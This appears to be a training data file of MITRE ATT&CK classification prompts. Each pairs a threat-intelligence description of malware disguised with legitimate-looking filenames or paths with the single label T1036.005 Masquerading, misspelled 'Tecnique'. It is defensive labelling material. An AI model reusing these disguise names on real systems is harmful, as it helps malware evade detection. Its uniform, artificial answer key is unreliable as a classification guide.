+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has named exfiltration archives to mimic Windows Updates at times using filenames with a `KB.zip` pattern.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has used fake icons including antivirus and external drives to disguise malicious payloads.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has dropped implants in folders named for legitimate software.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak has named malware ""svchost.exe,"" which is the name of the Windows shared service host program.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has renamed malware to GoogleUpdate.exe and WinRAR to jucheck.exe, RecordedTV.ms, teredo.tmp, update.exe, and msadcs1.exe.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has used malware that is disguised as a Secure Shell (SSH) tool.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used the command `move [file path] c:\windows\system32\spool\prtprocs\x64\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has masqueraded WAR files to look like legitimate packages such as, wsexample.war, wsexamples.com, examples.war, and exampl3s.war.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious Kitten has named malicious files update.exe and loaded them into the compromise host's “Public” folder.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used legitimate process names to hide malware including svchosst.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has dropped their malware into legitimate installed software paths including: `C:\ProgramFiles\Realtek\Audio\HDA\AERTSr.exe`, `C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitRdr64.exe`, `C:\Program Files (x86)\Adobe\Flash Player\AddIns\airappinstaller\airappinstall.exe`, and `C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd64.exe`.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has renamed malware to legitimate names such as ESTCommon.dll or patch.dll.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has disguised their exfiltration malware as `ZoomVideoApp.exe`.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete's Machete MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used `dllhost.exe` to mask Fast Reverse Proxy (FRP) and `MicrosoftOutLookUpdater.exe` for Plink.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise PlugX, and a file named `OneDrive.exe` to load a Cobalt Strike payload.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has used the filename `AutoUpdater.js` to mimic legitimate update files and has also used the Cyrillic homoglyph characters С `(0xd0a1)` and а `(0xd0b0)`, to produce the filename `Сhrome.Updаte.zip`.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has disguised malicious installer files by bundling them with legitimate software installers.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork installed its payload in the startup programs folder as ""Baidu Software Update."" The group also adds its second stage payload to the startup programs as “Net Monitor."" They have also dropped QuasarRAT binaries as files named microsoft_network.exe and crome.exe.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has used shell scripts which download mining executables and saves them with the filename ""java"".","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has avoided detection by naming a malicious binary explorer.exe.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has used a legitimate DLL file name, `Duser.dll` to disguise a malicious remote access tool.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has named malicious files rekeywiz.exe to match the name of a legitimate Windows executable.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has named its backdoor ""WINWORD.exe"".","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory CSIDL_APPDATA\microsoft\security.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used file names to mimic legitimate Windows files or system functionality.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used the name `debug.exe` for malware components.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe can mimic legitimate Windows directories by using the same icons and names.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has hidden payloads in Flash directories and fake installer files.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used legitimate looking filenames for compressed copies of the ntds.dit database and used names including cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe for the Earthworm and Fast Reverse Proxy tools.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following command to rename one of their tools to a benign file name: ren ""%temp%\upload"" audiodg.exe","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has been seen changing malicious files to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ANDROMEDA has been installed to `C:\Temp\TrustedInstaller.exe` to mimic a legitimate Windows installer service.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS attempts to hide its payloads using legitimate filenames.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has attempted to hide its payload by using legitimate file names such as ""iconcache.db"".","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has hidden malicious payloads in %USERPROFILE%\Adobe\Driver\dwg\ and mimicked the legitimate DHCP service binary.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has masqueraded as a Flash Player installer through the executable file install_flash_player.exe.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Bazar loader has named malicious shortcuts ""adobe"" and mimicked communications software.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has renamed malicious code to `msacm32.dll` to hide within a legitimate library; earlier versions were disguised as `winhelp`.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Black Basta dropper has mimicked an application for creating USB bootable drivers.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has used a payload file named OneDrive.update to appear benign.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has named component DLLs ""RapportGP.dll"" to match those used by the security company Trusteer.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has disguised a malicious .app file as a Flash Player update.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto's installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has masqueraded as Windows system file names, as well as ""chkntfs.exe"" and ""syscron.exe"".","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used an unsigned, crafted DLL module named hha.dll that was designed to look like a legitimate 32-bit Windows DLL.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chinoxy has used the name `eoffice.exe` in attempt to appear as a legitimate file.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can rename its running process to [kworker:0/1] to masquerade as a Linux kernel thread. Cyclops Blink has also named RC scripts used for persistence after WatchGuard artifacts.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has disguised a file as a Linux kernel module.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS has been disguised as update.exe to appear as a valid executable.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus has masqueraded as legitimate Adobe Content Management System files.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, FoggyWeb's loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value Chrome Update to appear legitimate.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has used filenames that matched the system name, and appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy's setup file installs initial executables under the folder %WinDir%\System32\PluginManager.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro has named malicious browser extensions and update files to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert has been disguised as a Growl help file.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has used the name `postgressql.exe` to mask a malicious payload.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple .NET assemblies have used `App_Web_` in their file names to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe has used registry values and file names associated with Adobe software, such as AcroRd32.exe.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY has masqueraded as a legitimate Windows tool.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has been disguised as legitimate software programs associated with the travel and airline industries.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has created a shortcut called ""Anti virus service.lnk"" in an apparent attempt to masquerade as a legitimate file.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron has used filenames associated with Exchange and Outlook for binary and configuration files, such as winmail.dat.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack has a C2 proxy tool that masquerades as GUP.exe, which is software used by Notepad++.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD has been named Readme.txt to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can masquerade as update.exe and svehost.exe; it has also mimicked legitimate Telegram and Chrome files.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has masqueraded as legitimate software including TeamViewer and macOS Finder.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae uses functions named StartUserModeBrowserInjection and StopUserModeBrowserInjection indicating that it's trying to imitate chrome_frame_helper.dll.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub has chosen file names to appear legitimate including EsetUpdate-0117583943.exe for its dropper.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has used legitimate looking filenames for its loader including update.dll and x64.dll.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OLDBAIT installs itself in %ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe; the directory name is missing a space and the file name is missing the letter ""o.""","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer can masquerade as a Flash Player update.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth uses the filename owaauth.dll, which is a legitimate file that normally resides in %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\; the malicious file by the same name is saved in %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin has mimicked the Cron binary to hide itself on compromised systems.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has been disguised as legitimate Adobe and PotPlayer files.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has used the Adobe Reader icon for the downloaded file to look more trustworthy.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop has used a DLL named Goopdate.dll to impersonate a legitimate Google update file.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
